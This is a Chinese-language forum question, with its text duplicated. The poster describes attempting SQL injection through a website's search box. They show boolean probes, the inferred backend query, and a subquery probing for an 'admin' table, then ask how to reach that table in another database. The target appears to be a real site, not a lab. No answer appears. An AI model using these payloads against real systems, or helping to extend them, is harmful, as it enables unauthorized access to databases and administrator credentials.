时间:2021-07-01 10:21:17 帮助过:23人阅读
XXX%' and 1=1 and '%'='正常显示,查询
XXX%' and 1=2 and '%'='时不正常显示,它的查询语句如下
SELECT d.* FROM Table1 d left join Table2 c on c.name = d.name WHERE d.id != 0 and c.location like '%(搜索框的内容)%' ……接着我想试试
XXX%' and (select count(*) from admin)>0 and '%'='结果爆出错误
Table 'child.admin' doesn't exist所以问题是,我怎么才能查admin这个表而不是去查*.admin是否存在呢?
在这里先谢谢大神了
是这样的,这两天在尝试通过文本搜索框注入一个站时,查询
XXX%' and 1=1 and '%'='正常显示,查询
XXX%' and 1=2 and '%'='时不正常显示,它的查询语句如下
SELECT d.* FROM Table1 d left join Table2 c on c.name = d.name WHERE d.id != 0 and c.location like '%(搜索框的内容)%' ……接着我想试试
XXX%' and (select count(*) from admin)>0 and '%'='结果爆出错误
Table 'child.admin' doesn't exist所以问题是,我怎么才能查admin这个表而不是去查*.admin是否存在呢?
在这里先谢谢大神了